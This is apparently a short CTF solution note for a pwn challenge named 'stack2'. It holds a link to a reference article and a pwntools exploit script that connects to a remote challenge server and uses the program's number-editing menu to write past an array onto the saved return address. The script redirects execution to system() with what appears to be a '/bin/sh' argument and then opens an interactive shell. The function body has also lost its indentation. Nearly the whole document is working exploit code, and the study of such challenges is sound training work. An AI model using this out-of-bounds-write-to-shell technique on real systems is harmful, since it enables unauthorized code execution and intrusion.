参考文章
https://blog.csdn.net/qq_43681242/article/details/104077461
exp
#!/usr/bin/env python
#coding:utf-8
from pwn import *
#p = process('./stack2')
p = remote('111.198.29.45',58596)
system_addr = 0x08048450
bish_addr = 0x08048987
leave_offset = 0x84
def write_adrr(addr,va):
p.sendline('3')
p.recvuntil('which number to change:\n')
p.sendline(str(addr))
p.recvuntil('new number:\n')
p.sendline(str(va))
p.recvuntil('5. exit\n')
p.sendlineafter('How many numbers you have:\n','1')
p.sendlineafter('Give me your numbers\n','2')
p.recvuntil('5. exit\n')
write_adrr(leave_offset,0x50)
write_adrr(leave_offset+1,0x84)
write_adrr(leave_offset+2,0x04)
write_adrr(leave_offset+3,0x08)
leave_offset +=8
write_adrr(leave_offset,0x87)
write_adrr(leave_offset+1,0x89)
write_adrr(leave_offset+2,0x04)
write_adrr(leave_offset+3,0x08)
p.sendline('5')
p.interactive()